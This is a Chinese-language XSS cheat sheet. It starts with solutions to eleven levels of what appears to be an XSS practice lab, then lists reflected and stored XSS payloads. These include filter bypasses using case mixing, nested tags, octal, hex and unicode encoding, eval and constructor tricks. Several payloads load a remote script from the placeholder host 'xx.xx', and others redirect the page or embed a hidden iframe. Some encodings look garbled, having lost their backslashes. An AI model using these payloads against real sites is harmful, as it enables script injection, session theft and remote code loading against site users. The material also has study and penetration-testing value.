1.<script>alert(1)</script> 2.源码第一个,[<]被转义,因此在第二个里 "><script>alert(1)</script><a class=" 3.源码对第一个,第二个对[<]做了转义,是单引 <input name=keyword value=' '>' onfocus='alert(1)<input name=keyword value='' onfocus='alert(1)'> 4.<input name=keyword value=" ">" onfocus="alert(1)<input name=keyword value="" onfocus="alert(1)"> 5.双引号,对on进行过滤 "><ScRiPt>alert(1)</script><a class=" 6.对script进行过滤 <input name=keyword value=" ">"><a href="javascript:alert(1)">点击我</a class="<input name=keyword value=" "><a href="javascript:alert(1)">点击我</a class=" "> 7.对href进行了过滤 <input name=keyword value=" ">"><ScRiPt>alert(1)</script><a class="<input name=keyword value=""><ScRiPt>alert(1)</script><a class=""> 8.对script进行过滤 <input name=keyword value=" ">"><scrscriptipt>alert(1)</scscriptript><a class="<input name=keyword value=""><scrscriptipt>alert(1)</scscriptript><a class=""> 9.对script进行了过滤,使用伪事件(用tab进行反过滤) <a href=" ">javascript:alert(1)<a href="javascript:alert(1)"> 10.发现只有使用http://,且他们为完整的就行,伪事件(将r转化为10进制) <a href=" ">javascript:alert('http://')<a href="javascript:alert('http://')"> 11.有三个input标签被隐藏 <input name="t_sort" value="333" type="hidden">&t_sort=333" onclick=alert(1) type="text<input name="t_sort" value="333" onclick=alert(1)type="text " type="hidden">
<script>alert('xss')</script> 最简单常用的poc "><script>alert(1)<script> <a href='' onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗 <img src=http://1.1.1.1/a.ipg onerror=alert('xss')> 加载图片,给一个错误的图片地址,错误则执行弹窗 <script>window.location=‘http://1.1.1.1'</script> 重定向到指定的url地址 <iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe> onmouseover=alert(document.domain) 闭合属性,构造on事件 onmousemove=alert(1) <input type=”text ” onfocus=prompt(1) autofocus> 利用input的autofocus属性,无需用户交互即可触发xss. htmlspecialchars:输入常用符号,看哪些符号没被实体编码。 如输入在herf或src里面:javascript:alert(1) js输出,输入的数据由js变量接收,通过</script>闭合即可
反射性 <script>alert(‘xss’)</script> <a href='' onclick=alert('xss')>type</a> <img src=1 onerror=alert(1)> <SCRIPT>alert(1)</SCRIPT> <Sscriptcript>alert(1)</Sscriptcript> 遗漏标签 <details open ontoggle=top['al'%2B'ert'](1) > <details open ontoggle=self['al'%2B'ert'](1) > <details open ontoggle=parent['al'%2B'ert'](1) > <details open ontoggle=frames['al'%2B'ert'](1) > <details open ontoggle=content['al'%2B'ert'](1) > <details open ontoggle=window['al'%2B'ert'](1) > JS8编码: <details open ontoggle=top['al145rt'](1) > <details open ontoggle=top['141154145162164'](1) > JS16编码: <details open ontoggle=top['alx65rt'](1) > 其他 <details open ontoggle=top[/al/.source%2B/ert/.source](1) > toString() <details open ontoggle=top[8680439..toString(30)](1); > <details open ontoggle=top[11189117..toString(32)](1); > <img src=1 alt=al lang=ert onerror=top[alt%2blang](0)> <details open ontoggle=top[a='al',b='ev',b%2ba]('alert(1)')> 将alert(1)编码,因为有eval存在 <details open ontoggle=top[a='al',b='ev',b%2ba](atob('YWxlcnQoMSk='))> <details open ontoggle=top[a='al',b='ev',b%2ba]('141154145162164506151')> <details open ontoggle=top[a='al',b='ev',b%2ba]('u0061u006cu0065u0072u0074u0028u0031u0029')> eval函数的补充 <svg/onload=setTimeout`alertu0028233u0029`> <svg/onload=setInterval('al'%2b'ert(1)')> 拆分与编码 <svg/onload=u0073etInterval(appendChild(createElement('script')).src='http://xx.xx/eeW')> <svg/onload=u0073etInterval(appendChild(createElement('sc162ipt')).src='http://xx.xx/eeW')> <svg/onload=u0073etInterval(appendChild(createElement('scr'%2b'ipt')).src='http://xx.xx/eeW')> <svg/onload=u0073etInterval(u0061ppendChild(u0063reateElement('scr'%2b'ipt')).src='http://xx.xx/eeW')> 结合函数: <iframe onload=s=createElement('script');body.appendChild(s);s.src=['http','://','xx.xx','/eeW'].join('') > <svg/onload=s=createElement('script');body.appendChild(s);s.src=['http']%2B['://']%2B['xx.xx']%2B['/eeW'].join('') > <svg/onload=s=u0063reateElement('scr'%2b'ipt');u0062ody.u0061ppendChild(s);s.src='http://x'.concat('x.xx/','eeW'); > constructor属性 <svg/onload=Set.constructor('al'%2b'ert(1)')()> <svg/onload=Set.constructor(appendChild(createElement('script')).src='http://xx.xx/eeW')()> <svg/onload=Set.constructor`alx65rtx28/xss/x29```> <svg/onload=Map.constructor`alx65rtx28/xss/x29```> <svg/onload=clear.constructor`alx65rtx28/xss/x29```> <svg/onload=Array.constructor`alx65rtx28/xss/x29```> <svg/onload=WeakSet.constructor`alx65rtx28/xss/x29```> 存储型 <script>alert(‘xss’)</script> <a href='' onclick=alert('xss')>type</a> <img src=1 onerror=alert(1)> <SCRIPT>alert(1)</SCRIPT> <Sscriptcript>alert(1)</Sscriptcript> <a href=javascript:alert(1)>a</a> <a href=javascript:alert(1)>a</a> $nickname = htmlentities(@$_POST['nickname']);//昵称